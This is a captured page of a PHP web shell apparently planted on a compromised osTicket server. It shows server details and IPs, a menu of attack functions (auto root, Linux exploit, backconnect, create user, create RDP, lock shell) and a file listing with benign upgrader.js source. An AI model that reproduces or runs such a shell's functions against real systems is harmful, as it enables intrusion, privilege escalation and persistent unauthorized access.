Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
osticket /
upload /
scp /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap-tab.js
3.3
KB
-rw-r--r--
bootstrap-tooltip.js
15.96
KB
-rw-r--r--
bootstrap-typeahead.js
9.08
KB
-rw-r--r--
dashboard.inc.js
3.71
KB
-rw-r--r--
g.dot-min.js
2.76
KB
-rw-r--r--
g.line-min.js
4.86
KB
-rw-r--r--
g.raphael.js
27.17
KB
-rw-r--r--
jb.overflow.menu.js
7.33
KB
-rw-r--r--
jquery.dropdown.js
2.23
KB
-rw-r--r--
jquery.translatable.js
6.98
KB
-rw-r--r--
raphael-min.js
88.52
KB
-rw-r--r--
scp.js
43.63
KB
-rw-r--r--
spectrum.js
77.17
KB
-rw-r--r--
thread.js
5.78
KB
-rw-r--r--
ticket.js
12.18
KB
-rw-r--r--
tips.js
11.05
KB
-rw-r--r--
upgrader.js
2.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upgrader.js
jQuery(function($) { $("#overlay").css({ opacity : 0.3, top : 0, left : 0, width : $(window).width(), height : $(window).height() }); $("#upgrading").css({ top : ($(window).height() / 3), left : ($(window).width() / 2 - 160) }); $('form#upgrade').submit(function(e) { var form = $(this); $('input[type=submit]', this).attr('disabled', 'disabled'); $('#overlay, #upgrading').show(); if($('input#mode', form).val() == 'manual') { return true; } else { e.preventDefault(); autoUpgrade('upgrade.php',form.serialize()); return false; } }); function autoUpgrade(url, data) { if (!$.isFunction('__')) { function __(s) { return s; } } function _lp(count) { $.ajax({ type: 'POST', url: 'ajax.php/upgrader', async: true, cache: false, data: data, dataType: 'text', success: function(res) { $('#main #task').html(res); $('#upgrading #action').html(res); $('#upgrading #msg').html(__('Still busy... smile #')+count); }, statusCode: { 200: function() { setTimeout(function() { _lp(count+1); }, 200); }, 201: function() { $('#upgrading #msg').html(__("Cleaning up!...")); setTimeout(function() { location.href =url+'?c='+count+'&r='+Math.floor((Math.random()*100)+1); }, 3000); } }, error: function(jqXHR, textStatus, errorThrown) { $('#upgrading #action').html(__('Error occurred. Aborting...')); switch(jqXHR.status) { case 404: $('#upgrading #msg').html(__("Manual upgrade required (ajax failed)")); setTimeout(function() { location.href =url+'?m=manual&c='+count+'&r='+Math.floor((Math.random()*100)+1); }, 2000); break; default: $('#upgrading #msg').html(__("Something went wrong")); setTimeout(function() { location.href =url+'?c='+count+'&r='+Math.floor((Math.random()*100)+1); }, 2000); } } }); }; _lp(1); } });
Close